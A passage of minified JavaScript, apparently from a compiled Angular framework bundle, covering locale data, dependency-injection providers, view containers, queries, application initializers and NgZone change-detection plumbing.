pe=Y?ch(te,i):q===i?te:void 0;if(k&&!Ev(pe)&&(pe=ch(T,i)),Ev(pe)&&(d=pe,c))return d;const Re=t[n+1];n=c?rm(Re):Mh(Re)}if(null!==a){let T=r?a.residualClasses:a.residualStyles;null!=T&&(d=ch(T,i))}return d}function Ev(t){return void 0!==t}function US(t,a){return 0!=(t.flags&(a?16:32))}function s(t,a=""){const e=bi(),i=Rn(),n=t+22,r=i.firstCreatePass?$0(i,n,1,a,null):i.data[n],c=e[n]=function SE(t,a){return t.createText(a)}(e[11],a);mv(i,e,c,r),_c(r,!1)}function ke(t){return ct("",t,""),ke}function ct(t,a,e){const i=bi(),n=Y0(i,t,a,e);return n!==mn&&vh(i,Ss(),n),ct}function za(t,a,e,i,n){const r=bi(),c=J0(r,t,a,e,i,n);return c!==mn&&vh(r,Ss(),c),za}function J_(t,a,e,i,n,r,c){const d=bi(),T=Z0(d,t,a,e,i,n,r,c);return T!==mn&&vh(d,Ss(),T),J_}function Dv(t,a,e){cm(ps,ou,Y0(bi(),t,a,e),!0)}function XS(t,a,e){!function nu(t){cm(VS,Iie,t,!1)}(Y0(bi(),t,a,e))}function Gs(t,a,e){const i=bi();return Mc(i,sd(),a)&&ql(Rn(),or(),i,t,a,i[11],e,!0),Gs}function s1(t,a,e){const i=bi();if(Mc(i,sd(),a)){const r=Rn(),c=or();ql(r,c,i,t,a,sS(Of(r.data),c,i),e,!0)}return s1}const Z_=void 0;var eae=["en",[["a","p"],["AM","PM"],Z_],[["AM","PM"],Z_,Z_],[["S","M","T","W","T","F","S"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Su","Mo","Tu","We","Th","Fr","Sa"]],Z_,[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],["January","February","March","April","May","June","July","August","September","October","November","December"]],Z_,[["B","A"],["BC","AD"],["Before Christ","Anno Domini"]],0,[6,0],["M/d/yy","MMM d, y","MMMM d, y","EEEE, MMMM d, y"],["h:mm a","h:mm:ss a","h:mm:ss a z","h:mm:ss a zzzz"],["{1}, {0}",Z_,"{1} 'at' {0}",Z_],[".",",",";","%","+","-","E","\xd7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0%","\xa4#,##0.00","#E0"],"USD","$","US Dollar",{},"ltr",function Zie(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}];let c1={};function Kc(t){const a=function iae(t){return t.toLowerCase().replace(/_/g,"-")}(t);let e=sk(a);if(e)return e;const i=a.split("-")[0];if(e=sk(i),e)return e;if("en"===i)return eae;throw new gi(701,!1)}function sk(t){return t in c1||(c1[t]=vo.ng&&vo.ng.common&&vo.ng.common.locales&&vo.ng.common.locales[t]),c1[t]}var Ji=(()=>((Ji=Ji||{})[Ji.LocaleId=0]="LocaleId",Ji[Ji.DayPeriodsFormat=1]="DayPeriodsFormat",Ji[Ji.DayPeriodsStandalone=2]="DayPeriodsStandalone",Ji[Ji.DaysFormat=3]="DaysFormat",Ji[Ji.DaysStandalone=4]="DaysStandalone",Ji[Ji.MonthsFormat=5]="MonthsFormat",Ji[Ji.MonthsStandalone=6]="MonthsStandalone",Ji[Ji.Eras=7]="Eras",Ji[Ji.FirstDayOfWeek=8]="FirstDayOfWeek",Ji[Ji.WeekendRange=9]="WeekendRange",Ji[Ji.DateFormat=10]="DateFormat",Ji[Ji.TimeFormat=11]="TimeFormat",Ji[Ji.DateTimeFormat=12]="DateTimeFormat",Ji[Ji.NumberSymbols=13]="NumberSymbols",Ji[Ji.NumberFormats=14]="NumberFormats",Ji[Ji.CurrencyCode=15]="CurrencyCode",Ji[Ji.CurrencySymbol=16]="CurrencySymbol",Ji[Ji.CurrencyName=17]="CurrencyName",Ji[Ji.Currencies=18]="Currencies",Ji[Ji.Directionality=19]="Directionality",Ji[Ji.PluralCase=20]="PluralCase",Ji[Ji.ExtraData=21]="ExtraData",Ji))();const l1="en-US";let ck=l1;function bD(t,a,e,i,n){if(t=La(t),Array.isArray(t))for(let r=0;r<t.length;r++)bD(t[r],a,e,i,n);else{const r=Rn(),c=bi();let d=je(t)?t:La(t.provide),T=dn(t);const k=nr(),q=1048575&k.providerIndexes,Y=k.directiveStart,te=k.providerIndexes>>20;if(je(t)||!t.multi){const pe=new ld(T,n,Ee),Re=vD(d,a,n?q:q+te,Y);-1===Re?(Km(ah(k,c),r,d),MD(r,t,a.length),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(pe),c.push(pe)):(e[Re]=pe,c[Re]=pe)}else{const pe=vD(d,a,q+te,Y),Re=vD(d,a,q,q+te),Fe=pe>=0&&e[pe],Ne=Re>=0&&e[Re];if(n&&!Ne||!n&&!Fe){Km(ah(k,c),r,d);const et=function Zae(t,a,e,i,n){const r=new ld(t,e,Ee);return r.multi=[],r.index=a,r.componentProviders=0,Pk(r,n,i&&!e),r}(n?Jae:Yae,e.length,n,i,T);!n&&Ne&&(e[Re].providerFactory=et),MD(r,t,a.length,0),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(et),c.push(et)}else MD(r,t,pe>-1?pe:Re,Pk(e[n?Re:pe],T,!n&&i));!n&&i&&Ne&&e[Re].componentProviders++}}}function MD(t,a,e,i){const n=je(a),r=function tt(t){return!!t.useClass}(a);if(n||r){const T=(r?La(a.useClass):a).prototype.ngOnDestroy;if(T){const k=t.destroyHooks||(t.destroyHooks=[]);if(!n&&a.multi){const q=k.indexOf(e);-1===q?k.push(e,[i,T]):k[q+1].push(i,T)}else k.push(e,T)}}}function Pk(t,a,e){return e&&t.componentProviders++,t.multi.push(a)-1}function vD(t,a,e,i){for(let n=e;n<i;n++)if(a[n]===t)return n;return-1}function Yae(t,a,e,i){return AD(this.multi,[])}function Jae(t,a,e,i){const n=this.multi;let r;if(this.providerFactory){const c=this.providerFactory.componentProviders,d=Xm(e,e[1],this.providerFactory.index,i);r=d.slice(0,c),AD(n,r);for(let T=c;T<d.length;T++)r.push(d[T])}else r=[],AD(n,r);return r}function AD(t,a){for(let e=0;e<t.length;e++)a.push((0,t[e])());return a}function ki(t,a=[]){return e=>{e.providersResolver=(i,n)=>function Xae(t,a,e){const i=Rn();if(i.firstCreatePass){const n=gr(t);bD(e,i.data,i.blueprint,n,!0),bD(a,i.data,i.blueprint,n,!1)}}(i,n?n(t):t,a)}}class eg{}class Ok{}class Nk extends eg{constructor(a,e){super(),this._parent=e,this._bootstrapComponents=[],this.destroyCbs=[],this.componentFactoryResolver=new dD(this);const i=ls(a);this._bootstrapComponents=bh(i.bootstrap),this._r3Injector=wR(a,e,[{provide:eg,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],Wo(a),new Set(["environment"])),this._r3Injector.resolveInjectorInitializers(),this.instance=this._r3Injector.get(a)}get injector(){return this._r3Injector}destroy(){const a=this._r3Injector;!a.destroyed&&a.destroy(),this.destroyCbs.forEach(e=>e()),this.destroyCbs=null}onDestroy(a){this.destroyCbs.push(a)}}class TD extends Ok{constructor(a){super(),this.moduleType=a}create(a){return new Nk(this.moduleType,a)}}class tne extends eg{constructor(a,e,i){super(),this.componentFactoryResolver=new dD(this),this.instance=null;const n=new ui([...a,{provide:eg,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],e||Lt(),i,new Set(["environment"]));this.injector=n,n.resolveInjectorInitializers()}destroy(){this.injector.destroy()}onDestroy(a){this.injector.onDestroy(a)}}function Sv(t,a,e=null){return new tne(t,a,e).injector}let ine=(()=>{class t{constructor(e){this._injector=e,this.cachedInjectors=new Map}getOrCreateStandaloneInjector(e){if(!e.standalone)return null;if(!this.cachedInjectors.has(e.id)){const i=cv(0,e.type),n=i.length>0?Sv([i],this._injector,`Standalone[${e.type.name}]`):null;this.cachedInjectors.set(e.id,n)}return this.cachedInjectors.get(e.id)}ngOnDestroy(){try{for(const e of this.cachedInjectors.values())null!==e&&e.destroy()}finally{this.cachedInjectors.clear()}}}return t.\u0275prov=hi({token:t,providedIn:"environment",factory:()=>new t(At(Ht))}),t})();function Lk(t){t.getStandaloneInjector=a=>a.get(ine).getOrCreateStandaloneInjector(t)}function kr(t,a,e){const i=hs()+t,n=bi();return n[i]===mn?au(n,i,e?a.call(e):a()):function UC(t,a){return t[a]}(n,i)}function fr(t,a,e,i){return Uk(bi(),hs(),t,a,e,i)}function Ah(t,a,e,i,n){return qk(bi(),hs(),t,a,e,i,n)}function JC(t,a){const e=t[a];return e===mn?void 0:e}function Uk(t,a,e,i,n,r){const c=a+e;return Mc(t,c,n)?au(t,c+1,r?i.call(r,n):i(n)):JC(t,c+1)}function qk(t,a,e,i,n,r,c){const d=a+e;return Y_(t,d,n,r)?au(t,d+2,c?i.call(c,n,r):i(n,r)):JC(t,d+2)}function oe(t,a){const e=Rn();let i;const n=t+22;e.firstCreatePass?(i=function Cne(t,a){if(a)for(let e=a.length-1;e>=0;e--){const i=a[e];if(t===i.name)return i}}(a,e.pipeRegistry),e.data[n]=i,i.onDestroy&&(e.destroyHooks||(e.destroyHooks=[])).push(n,i.onDestroy)):i=e.data[n];const r=i.factory||(i.factory=Qd(i.type)),c=Bs(Ee);try{const d=zf(!1),T=r();return zf(d),function fie(t,a,e,i){e>=t.data.length&&(t.data[e]=null,t.blueprint[e]=null),a[e]=i}(e,bi(),n,T),T}finally{Bs(c)}}function re(t,a,e){const i=t+22,n=bi(),r=Nc(n,i);return ZC(n,i)?Uk(n,hs(),a,r.transform,e,r):r.transform(e)}function ZC(t,a){return t[1].data[a].pure}function DD(t){return a=>{setTimeout(t,void 0,a)}}const Tt=class vne extends J{constructor(a=!1){super(),this.__isAsync=a}emit(a){super.next(a)}subscribe(a,e,i){var n,r,c;let d=a,T=e||(()=>null),k=i;if(a&&"object"==typeof a){const Y=a;d=null===(n=Y.next)||void 0===n?void 0:n.bind(Y),T=null===(r=Y.error)||void 0===r?void 0:r.bind(Y),k=null===(c=Y.complete)||void 0===c?void 0:c.bind(Y)}this.__isAsync&&(T=DD(T),d&&(d=DD(d)),k&&(k=DD(k)));const q=super.subscribe({next:d,error:T,complete:k});return a instanceof I&&a.add(q),q}};function Ane(){return this._results[X_()]()}class gd{constructor(a=!1){this._emitDistinctChangesOnly=a,this.dirty=!0,this._results=[],this._changesDetected=!1,this._changes=null,this.length=0,this.first=void 0,this.last=void 0;const e=X_(),i=gd.prototype;i[e]||(i[e]=Ane)}get changes(){return this._changes||(this._changes=new Tt)}get(a){return this._results[a]}map(a){return this._results.map(a)}filter(a){return this._results.filter(a)}find(a){return this._results.find(a)}reduce(a,e){return this._results.reduce(a,e)}forEach(a){this._results.forEach(a)}some(a){return this._results.some(a)}toArray(){return this._results.slice()}toString(){return this._results.toString()}reset(a,e){const i=this;i.dirty=!1;const n=ac(a);(this._changesDetected=!function yC(t,a,e){if(t.length!==a.length)return!1;for(let i=0;i<t.length;i++){let n=t[i],r=a[i];if(e&&(n=e(n),r=e(r)),r!==n)return!1}return!0}(i._results,n,e))&&(i._results=n,i.length=n.length,i.last=n[this.length-1],i.first=n[0])}notifyOnChanges(){this._changes&&(this._changesDetected||!this._emitDistinctChangesOnly)&&this._changes.emit(this)}setDirty(){this.dirty=!0}destroy(){this.changes.complete(),this.changes.unsubscribe()}}let ho=(()=>{class t{}return t.__NG_ELEMENT_ID__=Dne,t})();const Tne=ho,Ene=class extends Tne{constructor(a,e,i){super(),this._declarationLView=a,this._declarationTContainer=e,this.elementRef=i}createEmbeddedView(a,e){const i=this._declarationTContainer.tViews,n=gv(this._declarationLView,i,a,16,null,i.declTNode,null,null,null,null,e||null);n[17]=this._declarationLView[this._declarationTContainer.index];const c=this._declarationLView[19];return null!==c&&(n[19]=c.createEmbeddedView(i)),eD(i,n,a),new VC(n)}};function Dne(){return kv(nr(),bi())}function kv(t,a){return 4&t.type?new Ene(a,t,Gc(t,a)):null}let fo=(()=>{class t{}return t.__NG_ELEMENT_ID__=xne,t})();function xne(){return Yk(nr(),bi())}const wne=fo,Kk=class extends wne{constructor(a,e,i){super(),this._lContainer=a,this._hostTNode=e,this._hostLView=i}get element(){return Gc(this._hostTNode,this._hostLView)}get injector(){return new Ym(this._hostTNode,this._hostLView)}get parentInjector(){const a=Jd(this._hostTNode,this._hostLView);if(x0(a)){const e=Qm(a,this._hostLView),i=dd(a);return new Ym(e[1].data[i+8],e)}return new Ym(null,this._hostLView)}clear(){for(;this.length>0;)this.remove(this.length-1)}get(a){const e=Xk(this._lContainer);return null!==e&&e[a]||null}get length(){return this._lContainer.length-10}createEmbeddedView(a,e,i){let n,r;"number"==typeof i?n=i:null!=i&&(n=i.index,r=i.injector);const c=a.createEmbeddedView(e||{},r);return this.insert(c,n),c}createComponent(a,e,i,n,r){const c=a&&!function oh(t){return"function"==typeof t}(a);let d;if(c)d=e;else{const Y=e||{};d=Y.index,i=Y.injector,n=Y.projectableNodes,r=Y.environmentInjector||Y.ngModuleRef}const T=c?a:new BC(Un(a)),k=i||this.parentInjector;if(!r&&null==T.ngModule){const te=(c?k:this.parentInjector).get(Ht,null);te&&(r=te)}const q=T.create(k,n,void 0,r);return this.insert(q.hostView,d),q}insert(a,e){const i=a._lView,n=i[1];if(function eC(t){return Is(t[3])}(i)){const q=this.indexOf(a);if(-1!==q)this.detach(q);else{const Y=i[3],te=new Kk(Y,Y[6],Y[3]);te.detach(te.indexOf(a))}}const r=this._adjustIndex(e),c=this._lContainer;!function See(t,a,e,i){const n=10+i,r=e.length;i>0&&(e[n-1][4]=a),i<r-10?(a[4]=e[n],O_(e,10+i,a)):(e.push(a),a[4]=null),a[3]=e;const c=a[17];null!==c&&e!==c&&function kee(t,a){const e=t[9];a[16]!==a[3][3][16]&&(t[2]=!0),null===e?t[9]=[a]:e.push(a)}(c,a);const d=a[19];null!==d&&d.insertView(t),a[2]|=64}(n,i,c,r);const d=LE(r,c),T=i[11],k=dv(T,c[7]);return null!==k&&function wee(t,a,e,i,n,r){i[0]=n,i[6]=a,FC(t,i,e,1,n,r)}(n,c[6],T,i,k,d),a.attachToViewContainerRef(),O_(xD(c),r,a),a}move(a,e){return this.insert(a,e)}indexOf(a){const e=Xk(this._lContainer);return null!==e?e.indexOf(a):-1}remove(a){const e=this._adjustIndex(a,-1),i=PE(this._lContainer,e);i&&(rh(xD(this._lContainer),e),oR(i[1],i))}detach(a){const e=this._adjustIndex(a,-1),i=PE(this._lContainer,e);return i&&null!=rh(xD(this._lContainer),e)?new VC(i):null}_adjustIndex(a,e=0){return null==a?this.length+e:a}};function Xk(t){return t[8]}function xD(t){return t[8]||(t[8]=[])}function Yk(t,a){let e;const i=a[t.index];if(Is(i))e=i;else{let n;if(8&t.type)n=Ar(i);else{const r=a[11];n=r.createComment("");const c=pc(t,a);K_(r,dv(r,c),n,function Lee(t,a){return t.nextSibling(a)}(r,c),!1)}a[t.index]=e=nS(i,a,n,t),yv(a,e)}return new Kk(e,t,a)}class wD{constructor(a){this.queryList=a,this.matches=null}clone(){return new wD(this.queryList)}setDirty(){this.queryList.setDirty()}}class ID{constructor(a=[]){this.queries=a}createEmbeddedView(a){const e=a.queries;if(null!==e){const i=null!==a.contentQueries?a.contentQueries[0]:e.length,n=[];for(let r=0;r<i;r++){const c=e.getByIndex(r);n.push(this.queries[c.indexInDeclarationView].clone())}return new ID(n)}return null}insertView(a){this.dirtyQueriesWithMatches(a)}detachView(a){this.dirtyQueriesWithMatches(a)}dirtyQueriesWithMatches(a){for(let e=0;e<this.queries.length;e++)null!==a9(a,e).matches&&this.queries[e].setDirty()}}class Jk{constructor(a,e,i=null){this.predicate=a,this.flags=e,this.read=i}}class RD{constructor(a=[]){this.queries=a}elementStart(a,e){for(let i=0;i<this.queries.length;i++)this.queries[i].elementStart(a,e)}elementEnd(a){for(let e=0;e<this.queries.length;e++)this.queries[e].elementEnd(a)}embeddedTView(a){let e=null;for(let i=0;i<this.length;i++){const n=null!==e?e.length:0,r=this.getByIndex(i).embeddedTView(a,n);r&&(r.indexInDeclarationView=i,null!==e?e.push(r):e=[r])}return null!==e?new RD(e):null}template(a,e){for(let i=0;i<this.queries.length;i++)this.queries[i].template(a,e)}getByIndex(a){return this.queries[a]}get length(){return this.queries.length}track(a){this.queries.push(a)}}class SD{constructor(a,e=-1){this.metadata=a,this.matches=null,this.indexInDeclarationView=-1,this.crossesNgTemplate=!1,this._appliesToNextNode=!0,this._declarationNodeIndex=e}elementStart(a,e){this.isApplyingToNode(e)&&this.matchTNode(a,e)}elementEnd(a){this._declarationNodeIndex===a.index&&(this._appliesToNextNode=!1)}template(a,e){this.elementStart(a,e)}embeddedTView(a,e){return this.isApplyingToNode(a)?(this.crossesNgTemplate=!0,this.addMatch(-a.index,e),new SD(this.metadata)):null}isApplyingToNode(a){if(this._appliesToNextNode&&1!=(1&this.metadata.flags)){const e=this._declarationNodeIndex;let i=a.parent;for(;null!==i&&8&i.type&&i.index!==e;)i=i.parent;return e===(null!==i?i.index:-1)}return this._appliesToNextNode}matchTNode(a,e){const i=this.metadata.predicate;if(Array.isArray(i))for(let n=0;n<i.length;n++){const r=i[n];this.matchTNodeWithReadOption(a,e,Sne(e,r)),this.matchTNodeWithReadOption(a,e,nh(e,a,r,!1,!1))}else i===ho?4&e.type&&this.matchTNodeWithReadOption(a,e,-1):this.matchTNodeWithReadOption(a,e,nh(e,a,i,!1,!1))}matchTNodeWithReadOption(a,e,i){if(null!==i){const n=this.metadata.read;if(null!==n)if(n===mi||n===fo||n===ho&&4&e.type)this.addMatch(e.index,-2);else{const r=nh(e,a,n,!1,!1);null!==r&&this.addMatch(e.index,r)}else this.addMatch(e.index,i)}}addMatch(a,e){null===this.matches?this.matches=[a,e]:this.matches.push(a,e)}}function Sne(t,a){const e=t.localNames;if(null!==e)for(let i=0;i<e.length;i+=2)if(e[i]===a)return e[i+1];return null}function Pne(t,a,e,i){return-1===e?function kne(t,a){return 11&t.type?Gc(t,a):4&t.type?kv(t,a):null}(a,t):-2===e?function One(t,a,e){return e===mi?Gc(a,t):e===ho?kv(a,t):e===fo?Yk(a,t):void 0}(t,a,i):Xm(t,t[1],e,a)}function Zk(t,a,e,i){const n=a[19].queries[i];if(null===n.matches){const r=t.data,c=e.matches,d=[];for(let T=0;T<c.length;T+=2){const k=c[T];d.push(k<0?null:Pne(a,r[k],c[T+1],e.metadata.read))}n.matches=d}return n.matches}function kD(t,a,e,i){const n=t.queries.getByIndex(e),r=n.matches;if(null!==r){const c=Zk(t,a,n,e);for(let d=0;d<r.length;d+=2){const T=r[d];if(T>0)i.push(c[d/2]);else{const k=r[d+1],q=a[-T];for(let Y=10;Y<q.length;Y++){const te=q[Y];te[17]===te[3]&&kD(te[1],te,k,i)}if(null!==q[9]){const Y=q[9];for(let te=0;te<Y.length;te++){const pe=Y[te];kD(pe[1],pe,k,i)}}}}}return i}function Vt(t){const a=bi(),e=Rn(),i=cd();C_(i+1);const n=a9(e,i);if(t.dirty&&function $u(t){return 4==(4&t[2])}(a)===(2==(2&n.metadata.flags))){if(null===n.matches)t.reset([]);else{const r=n.crossesNgTemplate?kD(e,a,i,[]):Zk(e,a,n,i);t.reset(r,yc),t.notifyOnChanges()}return!0}return!1}function Mi(t,a,e){const i=Rn();i.firstCreatePass&&(t9(i,new Jk(t,a,e),-1),2==(2&a)&&(i.staticViewQueries=!0)),e9(i,bi(),a)}function ha(t,a,e,i){const n=Rn();if(n.firstCreatePass){const r=nr();t9(n,new Jk(a,e,i),r.index),function Lne(t,a){const e=t.contentQueries||(t.contentQueries=[]);a!==(e.length?e[e.length-1]:-1)&&e.push(t.queries.length-1,a)}(n,t),2==(2&e)&&(n.staticContentQueries=!0)}e9(n,bi(),e)}function Bt(){return function Nne(t,a){return t[19].queries[a].queryList}(bi(),cd())}function e9(t,a,e){const i=new gd(4==(4&e));KR(t,a,i,i.destroy),null===a[19]&&(a[19]=new ID),a[19].queries.push(new wD(i))}function t9(t,a,e){null===t.queries&&(t.queries=new RD),t.queries.track(new SD(a,e))}function a9(t,a){return t.queries.getByIndex(a)}function d1(t,a){return kv(t,a)}function Ov(...t){}const Nv=new ni("Application Initializer");let Lv=(()=>{class t{constructor(e){this.appInits=e,this.resolve=Ov,this.reject=Ov,this.initialized=!1,this.done=!1,this.donePromise=new Promise((i,n)=>{this.resolve=i,this.reject=n})}runInitializers(){if(this.initialized)return;const e=[],i=()=>{this.done=!0,this.resolve()};if(this.appInits)for(let n=0;n<this.appInits.length;n++){const r=this.appInits[n]();if(qC(r))e.push(r);else if(fD(r)){const c=new Promise((d,T)=>{r.subscribe({complete:d,error:T})});e.push(c)}}Promise.all(e).then(()=>{i()}).catch(n=>{this.reject(n)}),0===e.length&&i(),this.initialized=!0}}return t.\u0275fac=function(e){return new(e||t)(At(Nv,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const h1=new ni("AppId",{providedIn:"root",factory:function v9(){return`${zD()}${zD()}${zD()}`}});function zD(){return String.fromCharCode(97+Math.floor(25*Math.random()))}const A9=new ni("Platform Initializer"),lm=new ni("Platform ID",{providedIn:"platform",factory:()=>"unknown"}),T9=new ni("appBootstrapListener"),ir=new ni("AnimationModuleType");let ioe=(()=>{class t{log(e){console.log(e)}warn(e){console.warn(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();const dm=new ni("LocaleId",{providedIn:"root",factory:()=>Po(dm,Da.Optional|Da.SkipSelf)||function aoe(){return"undefined"!=typeof $localize&&$localize.locale||l1}()});class ooe{constructor(a,e){this.ngModuleFactory=a,this.componentFactories=e}}let WD=(()=>{class t{compileModuleSync(e){return new TD(e)}compileModuleAsync(e){return Promise.resolve(this.compileModuleSync(e))}compileModuleAndAllComponentsSync(e){const i=this.compileModuleSync(e),r=bh(ls(e).declarations).reduce((c,d)=>{const T=Un(d);return T&&c.push(new BC(T)),c},[]);return new ooe(i,r)}compileModuleAndAllComponentsAsync(e){return Promise.resolve(this.compileModuleAndAllComponentsSync(e))}clearCache(){}clearCacheFor(e){}getModuleId(e){}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const coe=(()=>Promise.resolve(0))();function FD(t){"undefined"==typeof Zone?coe.then(()=>{t&&t.apply(null,null)}):Zone.current.scheduleMicroTask("scheduleMicrotask",t)}class qi{constructor({enableLongStackTrace:a=!1,shouldCoalesceEventChangeDetection:e=!1,shouldCoalesceRunChangeDetection:i=!1}){if(this.hasPendingMacrotasks=!1,this.hasPendingMicrotasks=!1,this.isStable=!0,this.onUnstable=new Tt(!1),this.onMicrotaskEmpty=new Tt(!1),this.onStable=new Tt(!1),this.onError=new Tt(!1),"undefined"==typeof Zone)throw new gi(908,!1);Zone.assertZonePatched();const n=this;if(n._nesting=0,n._outer=n._inner=Zone.current,Zone.AsyncStackTaggingZoneSpec){const r=Zone.AsyncStackTaggingZoneSpec;n._inner=n._inner.fork(new r("Angular"))}Zone.TaskTrackingZoneSpec&&(n._inner=n._inner.fork(new Zone.TaskTrackingZoneSpec)),a&&Zone.longStackTraceZoneSpec&&(n._inner=n._inner.fork(Zone.longStackTraceZoneSpec)),n.shouldCoalesceEventChangeDetection=!i&&e,n.shouldCoalesceRunChangeDetection=i,n.lastRequestAnimationFrameId=-1,n.nativeRequestAnimationFrame=function loe(){let t=vo.requestAnimationFrame,a=vo.cancelAnimationFrame;if("undefined"!=typeof Zone&&t&&a){const e=t[Zone.__symbol__("OriginalDelegate")];e&&(t=e);const i=a[Zone.__symbol__("OriginalDelegate")];i&&(a=i)}return{nativeRequestAnimationFrame:t,nativeCancelAnimationFrame:a}}().nativeRequestAnimationFrame,function uoe(t){const a=()=>{!function moe(t){t.isCheckStableRunning||-1!==t.lastRequestAnimationFrameId||(t.lastRequestAnimationFrameId=t.nativeRequestAnimationFrame.call(vo,()=>{t.fakeTopEventTask||(t.fakeTopEventTask=Zone.root.scheduleEventTask("fakeTopEventTask",()=>{t.lastRequestAnimationFrameId=-1,BD(t),t.isCheckStableRunning=!0,VD(t),t.isCheckStableRunning=!1},void 0,()=>{},()=>{})),t.fakeTopEventTask.invoke()}),BD(t))}(t)};t._inner=t._inner.fork({name:"angular",properties:{isAngularZone:!0},onInvokeTask:(e,i,n,r,c,d)=>{try{return x9(t),e.invokeTask(n,r,c,d)}finally{(t.shouldCoalesceEventChangeDetection&&"eventTask"===r.type||t.shouldCoalesceRunChangeDetection)&&a(),w9(t)}},onInvoke:(e,i,n,r,c,d,T)=>{try{return x9(t),e.invoke(n,r,c,d,T)}finally{t.shouldCoalesceRunChangeDetection&&a(),w9(t)}},onHasTask:(e,i,n,r)=>{e.hasTask(n,r),i===n&&("microTask"==r.change?(t._hasPendingMicrotasks=r.microTask,BD(t),VD(t)):"macroTask"==r.change&&(t.hasPendingMacrotasks=r.macroTask))},onHandleError:(e,i,n,r)=>(e.handleError(n,r),t.runOutsideAngular(()=>t.onError.emit(r)),!1)})}(n)}static isInAngularZone(){return"undefined"!=typeof Zone&&!0===Zone.current.get("isAngularZone")}static assertInAngularZone(){if(!qi.isInAngularZone())throw new gi(909,!1)}static assertNotInAngularZone(){if(qi.isInAngularZone())throw new gi(909,!1)}run(a,e,i){return this._inner.run(a,e,i)}runTask(a,e,i,n){const r=this._inner,c=r.scheduleEventTask("NgZoneEvent: "+n,a,doe,Ov,Ov);try{return r.runTask(c,e,i)}finally{r.cancelTask(c)}}runGuarded(a,e,i){return this._inner.runGuarded(a,e,i)}runOutsideAngular(a){return this._outer.run(a)}}const doe={};function VD(t){if(0==t._nesting&&!t.hasPendingMicrotasks&&!t.isStable)try{t._nesting++,t.onMicrotaskEmpty.emit(null)}finally{if(t._nesting--,!t.hasPendingMicrotasks)try{t.runOutsideAngular(()=>t.onStable.emit(null))}finally{t.isStable=!0}}}function BD(t){t.hasPendingMicrotasks=!!(t._hasPendingMicrotasks||(t.shouldCoalesceEventChangeDetection||t.shouldCoalesceRunChangeDetection)&&-1!==t.lastRequestAnimationFrameId)}function x9(t){t._nesting++,t.isStable&&(t.isStable=!1,t.onUnstable.emit(null))}function w9(t){t._nesting--,VD(t)}class hoe{constructor(){this.hasPendingMicrotasks=!1,this.hasPendingMacrotasks=!1,this.isStable=!0,this.onUnstable=new Tt,this.onMicrotaskEmpty=new Tt,this.onStable=new Tt,this.onError=new Tt}run(a,e,i){return a.apply(e,i)}runGuarded(a,e,i){return a.apply(e,i)}runOutsideAngular(a){return a()}runTask(a,e,i,n){return a.apply(e,i)}}const I9=new ni(""),zv=new ni("");let ty,HD=(()=>{class t{constructor(e,i,n){this._ngZone=e,this.registry=i,this._pendingCount=0,this._isZoneStable=!0,this._didWork=!1,this._callbacks=[],this.taskTrackingZone=null,ty||(function foe(t){ty=t}(n),n.addToWindow(i)),this._watchAngularEvents(),e.run(()=>{this.taskTrackingZone="undefined"==typeof Zone?null:Zone.current.get("TaskTrackingZone")})}_watchAngularEvents(){this._ngZone.onUnstable.subscribe({next:()=>{this._didWork=!0,this._isZoneStable=!1}}),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.subscribe({next:()=>{qi.assertNotInAngularZone(),FD(()=>{this._isZoneStable=!0,this._runCallbacksIfReady()})}})})}increasePendingRequestCount(){return this._pendingCount+=1,this._didWork=!0,this._pendingCount}decreasePendingRequestCount(){if(this._pendingCount-=1,this._pendingCount<0)throw new Error("pending async requests below zero");return this._runCallbacksIfReady(),this._pendingCount}isStable(){return this._isZoneStable&&0===this._pendingCount&&!this._ngZone.hasPendingMacrotasks}_runCallbacksIfReady(){if(this.isStable())FD(()=>{for(;0!==this._callbacks.length;){let e=this._callbacks.pop();clearTimeout(e.timeoutId),e.doneCb(this._didWork)}this._didWork=!1});else{let e=this.getPendingTasks();this._callbacks=this._callbacks.filter(i=>!i.updateCb||!i.updateCb(e)||(clearTimeout(i.timeoutId),!1)),this._didWork=!0}}getPendingTasks(){return this.taskTrackingZone?this.taskTrackingZone.macroTasks.map(e=>({source:e.source,creationLocation:e.creationLocation,data:e.data})):[]}addCallback(e,i,n){let r=-1;i&&i>0&&(r=setTimeout(()=>{this._callbacks=this._callbacks.filter(c=>c.timeoutId!==r),e(this._didWork,this.getPendingTasks())},i)),this._callbacks.push({doneCb:e,timeoutId:r,updateCb:n})}whenStable(e,i,n){if(n&&!this.taskTrackingZone)throw new Error('Task tracking zone is required when passing an update callback to whenStable(). Is "zone.js/plugins/task-tracking" loaded?');this.addCallback(e,i,n),this._runCallbacksIfReady()}getPendingRequestCount(){return this._pendingCount}registerApplication(e){this.registry.registerApplication(e,this)}unregisterApplication(e){this.registry.unregisterApplication(e)}findProviders(e,i,n){return[]}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(UD),At(zv))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),UD=(()=>{class t{constructor(){this._applications=new Map}registerApplication(e,i){this._applications.set(e,i)}unregisterApplication(e){this._applications.delete(e)}unregisterAllApplications(){this._applications.clear()}getTestability(e){return this._applications.get(e)||null}getAllTestabilities(){return Array.from(this._applications.values())}getAllRootElements(){return Array.from(this._applications.keys())}findTestabilityInTree(e,i=!0){var n;return null!==(n=null==ty?void 0:ty.findTestabilityInTree(this,e,i))&&void 0!==n?n:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})(),ru=null;const R9=new ni("AllowMultipleToken"),qD=new ni("PlatformDestroyListeners");class 